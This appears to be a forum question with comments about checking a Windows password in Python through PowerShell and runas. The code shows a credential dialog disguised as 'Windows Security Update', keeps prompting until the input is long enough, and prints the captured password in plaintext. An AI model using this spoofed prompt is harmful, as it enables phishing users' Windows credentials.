# Python powershell Runas verification

Tags: python, python-3.x, powershell, runas

For my code I need to verify that the inputted windows password is valid. I would like to do this with subprocesses. The Runas function checks if the password which is implemented is correct. But how do I fill in the password(which is equal to the variable response) and get back that response. Its like a 2-way thing first it has to prompt the user for a password and this password gets saved. And after that it uses runas and should give the password to check if the password given is correct. So:

1. input to cmd: runas /user:Administrator cmd
2. cmd gives back:*Enter the password for Administrator:*
3. program fills in password as given variable "response"
4. program checks output to know if the password inputted was correct

The question is how to perform step 3

```
import sys
import subprocess

response = ''

def run_command(command):
    try:
        subp = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
        subp_output, errors = subp.communicate()
        if not errors:
            if subp_output == '':
                return '[+] Command successfully executed.\n'
            else:
                return subp_output
        return format(errors)
    except KeyboardInterrupt:
        print("Terminated command.")

while True:
    cmd1 = "$cred=$host.ui.promptforcredential('Windows Security Update','',[Environment]::UserName,[Environment]::UserDomainName);"
    cmd2 = 'echo $cred.getnetworkcredential().password;'
    full_cmd = 'Powershell "{} {}"'.format(cmd1, cmd2)
    response = run_command(full_cmd)
    #check = "runas / user:Administrator cmd"
    #checked = run_command(check)
    #USE RUNAS OUTPUT TRUE TO BREAK LOOP
    if len(response.strip()) >= 7: # MINIMAL PASSWORD LENGTH
        break
response = '[+] Password: {}'.format(response.strip().decode())
print(response)
```

Comment: Your description says you do "runas" first then ask for password, but your code does it the opposite.  And do you understand how horribly dangerous it is for you to be throwing your Windows password around in plaintext?

Comment: @TimRoberts sorry for my weak explanation. It should fill in the inserted password into the runas command. So when the function calls runas powershell/cmd, powershell/cmd will ask for a password. And the next function should fill in the password given by the user and check if the password corresponds. The purpose of this code isnt really build around security but I agree it would be good practice.I'll think I will use sha256 for encryption( I am not very experienced in this but I'll look into it).

Comment: Why do you need to know the password is valid? What are you trying to accomplish?

Comment: @ChrisWesseling Because if the password check does not exist the user can fill in a random string and it passes through. I am trying to make a Python Runas verification system

Comment: Doesn't runas do the verification itself?

Comment: I'm frankly shocked that "runas" reads the password from stdin, as opposed to forcing input from the console, but that seems to be exactly what it does.  But how to you tell "promptforcredntials" that you want the password for user "Administrator", assuming the computer even has that?